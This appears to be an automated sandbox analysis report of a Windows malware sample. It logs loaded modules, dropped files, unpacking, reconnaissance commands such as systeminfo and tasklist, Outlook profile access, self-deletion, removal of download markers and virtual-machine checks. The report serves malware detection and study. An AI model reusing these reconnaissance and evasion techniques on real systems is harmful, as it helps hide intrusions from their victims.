Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: winbrand.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\uievsid	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\uievsid	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\uievsid	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\haevsid	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\haevsid	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\haevsid	Section loaded: msvcr100.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\ipconfig.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\ROUTE.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\ROUTE.EXE	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\ROUTE.EXE	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\ROUTE.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\systeminfo.exe systeminfo

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv

Source: C:\Windows\SysWOW64\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: C:\Users\user\Desktop\veEGy9FijY.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: veEGy9FijY.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\veEGy9FijY.exe	Unpacked PE file: 0.2.veEGy9FijY.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\haevsid	Unpacked PE file: 5.2.haevsid.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Unpacked PE file: 7.2.38E5.exe.400000.0.unpack .text:ER;.data:W;.yatufu:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\uievsid	Unpacked PE file: 9.2.uievsid.400000.0.unpack .text:ER;.data:W;.yatufu:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\uievsid	Unpacked PE file: 33.2.uievsid.400000.0.unpack .text:ER;.data:W;.yatufu:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\haevsid	Unpacked PE file: 34.2.haevsid.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;

Source: C:\Users\user\AppData\Local\Temp\BC8F.exe

10_2_00007FF6AAB43220

Source: 38E5.exe.1.dr	Static PE information: section name: .yatufu
Source: uievsid.1.dr	Static PE information: section name: .yatufu

Source: C:\Users\user\Desktop\veEGy9FijY.exe	Code function: 0_2_004014D9 pushad ; ret	0_2_004014E9
Source: C:\Users\user\Desktop\veEGy9FijY.exe	Code function: 0_2_004031DB push eax; ret	0_2_004032AB
Source: C:\Users\user\Desktop\veEGy9FijY.exe	Code function: 0_2_025B1540 pushad ; ret	0_2_025B1550
Source: C:\Users\user\Desktop\veEGy9FijY.exe	Code function: 0_2_0278385A push esp; ret	0_2_0278385C
Source: C:\Users\user\Desktop\veEGy9FijY.exe	Code function: 0_2_027826FA pushfd ; iretd	0_2_027826FB
Source: C:\Users\user\Desktop\veEGy9FijY.exe	Code function: 0_2_02781BFD push B63524ADh; retn 001Fh	0_2_02781C34
Source: C:\Users\user\Desktop\veEGy9FijY.exe	Code function: 0_2_0276D884 pushad ; retf	0_2_0276D885
Source: C:\Users\user\AppData\Roaming\haevsid	Code function: 5_2_004014D9 pushad ; ret	5_2_004014E9
Source: C:\Users\user\AppData\Roaming\haevsid	Code function: 5_2_004031DB push eax; ret	5_2_004032AB
Source: C:\Users\user\AppData\Roaming\haevsid	Code function: 5_2_025B1540 pushad ; ret	5_2_025B1550
Source: C:\Users\user\AppData\Roaming\haevsid	Code function: 5_2_02751035 push B63524ADh; retn 001Fh	5_2_0275106C
Source: C:\Users\user\AppData\Roaming\haevsid	Code function: 5_2_02751B32 pushfd ; iretd	5_2_02751B33
Source: C:\Users\user\AppData\Roaming\haevsid	Code function: 5_2_02752C92 push esp; ret	5_2_02752C94
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Code function: 7_2_0040100B push esi; ret	7_2_0040100C
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Code function: 7_2_0040280E push esp; ret	7_2_004029C6
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Code function: 7_2_0040281F push esp; ret	7_2_004029C6
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Code function: 7_2_00402822 push esp; ret	7_2_004029C6
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Code function: 7_2_00401328 push edi; retf	7_2_0040132A
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Code function: 7_2_004027ED push esp; ret	7_2_004029C6
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Code function: 7_2_004027FB push esp; ret	7_2_004029C6
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Code function: 7_2_00434013 push ecx; ret	7_2_00434026
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Code function: 7_2_004351E5 push ecx; ret	7_2_004351F8
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Code function: 7_2_0043A6F7 push ebx; ret	7_2_0043A6F8
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Code function: 7_2_00612862 push esp; ret	7_2_00612A2D
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Code function: 7_2_00611072 push esi; ret	7_2_00611073
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Code function: 7_2_00612875 push esp; ret	7_2_00612A2D
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Code function: 7_2_00612854 push esp; ret	7_2_00612A2D
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Code function: 7_2_00612886 push esp; ret	7_2_00612A2D
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Code function: 7_2_00612889 push esp; ret	7_2_00612A2D
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Code function: 7_2_00611909 push esp; iretd	7_2_006119BF
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Code function: 7_2_00611386 push edi; retf	7_2_00611391

Source: 38E5.exe.1.dr	Static PE information: section name: .text entropy: 7.722655643147913
Source: uievsid.1.dr	Static PE information: section name: .text entropy: 7.722655643147913

Persistence and Installation Behavior

Uses ipconfig to lookup or modify the Windows network settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\haevsid	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\BC8F.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\38E5.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\uievsid	Jump to dropped file

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\uievsid			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\haevsid			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\veegy9fijy.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\haevsid:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\uievsid:Zone.Identifier read attributes \| delete			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\BC8F.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

